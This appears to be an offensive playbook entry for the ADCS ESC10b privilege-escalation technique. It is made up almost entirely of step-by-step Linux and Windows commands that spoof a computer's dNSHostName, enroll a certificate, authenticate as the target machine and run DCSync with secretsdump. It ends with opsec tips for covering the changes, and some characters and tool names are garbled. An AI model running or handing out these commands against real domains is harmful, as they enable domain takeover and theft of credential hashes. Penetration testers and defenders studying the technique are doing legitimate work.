ADCSESC10b
ESC10b: Weak certificate mapping (CertificateMappingMethods includes UPN/SAN) + GenericWrite on a computer account β strip SPNs, change victim computer's dNSHostName to target computer's FQDN, enroll cert, restore, authenticate as target computer.
Applies to: Principals with GenericWrite on a computer account β any Machine Auth template β DC with CertificateMappingMethods including 0x4 (subject/issuer) or weak binding
Linux Abuse
certipy-ad
# Step 1: Confirm ESC10b condition
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout
# Step 2: Remove conflicting SPNs from victim computer
ldapsearch -x -D '<attacker-dn>' -w '<password>' -h <dc-ip> \
-b '<victim-computer-dn>' servicePrincipalName
echo -e "dn: <victim-computer-dn>\nchangetype: modify\ndelete: servicePrincipalName\nservicePrincipalName: HOST/<victim-computer>" \
| ldapmodify -x -D '<attacker-dn>' -w '<password>' -h <dc-ip>
# Also remove RestrictedKrbHost SPN if present:
echo -e "dn: <victim-computer-dn>\nchangetype: modify\ndelete: servicePrincipalName\nservicePrincipalName: RestrictedKrbHost/<victim-computer>" \
| ldapmodify -x -D '<attacker-dn>' -w '<password>' -h <dc-ip>
# Step 3: Change victim computer dNSHostName to target computer FQDN
certipy-ad account update -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-user '<victim-computer>$' -dns <target-computer>.<domain>
# Step 4: Set mail if required
echo -e "dn: <victim-computer-dn>\nchangetype: modify\nreplace: mail\nmail: dummy@mail.com" \
| ldapmodify -x -D '<attacker-dn>' -w '<password>' -h <dc-ip>
# Step 5: Get victim computer credentials
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-account '<victim-computer>$'
# Step 6: Enroll cert as victim computer (dNSHostName = target FQDN)
certipy-ad req -u '<victim-computer>$@<domain>' -hashes ':<victim-ntlm>' -dc-ip <dc-ip> \
-ca '<ca>' -target <ca-host> -template '<template>'
# Output: <target-computer>.pfx
# Step 7: Restore dNSHostName
certipy-ad account update -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-user '<victim-computer>$' -dns <victim-computer>.<domain>
# Step 8: Authenticate as target computer
certipy-ad auth -pfx <target-computer>.pfx -dc-ip <dc-ip> -ldap-shell
# Step 9: If target is DC β DCSync
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-computer>$@<dc-ip>'
Windows Abuse
PowerView + Certify.exe + Rubeus
# Step 1: Remove SPNs
Set-DomainObject -Identity '<victim-computer>$' -Clear serviceprincipalname
# Or set a non-conflicting one:
Set-DomainObject -Identity '<victim-computer>$' -Set @{'serviceprincipalname'='HOST/<victim-computer>'}
# Step 2: Change dNSHostName
Set-DomainObject -Identity '<victim-computer>$' -Set @{'dnshostname'='<target-computer>.<domain>'}
# Step 3: Set mail if required
Set-DomainObject -Identity '<victim-computer>$' -Set @{'mail'='dummy@mail.com'}
# Step 4: Enroll cert as victim computer
Certipy.exe req -u '<victim-computer>$@<domain>' -p '<victim-password>' -dc-ip <dc-ip> \
-ca '<ca>' -target <ca-host> -template '<template>'
# Step 5: Restore dNSHostName
Certipy.exe account update -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-user '<victim-computer>$' -dns <victim-computer>.<domain>
# Step 6: Authenticate
Certipy.exe auth -pfx <target-computer>.pfx -dc-ip <dc-ip> -ldap-shell
# Alternative TGT via Rubeus
Rubeus.exe asktgt /user:'<target-computer>$' /domain:<domain> /certificate:<pfx-base64> /ptt
Opsec
- SPN and dNSHostName changes are logged (Event ID 4742).
- Restore both attributes immediately after enrollment.
- CertificateMappingMethods registry key on DC:
HKLM\SYSTEM\CurrentControlSet\Services\Kdcβ value must include 0x4 for this to work. - CA retains issued cert; victim computer account is the logged requester.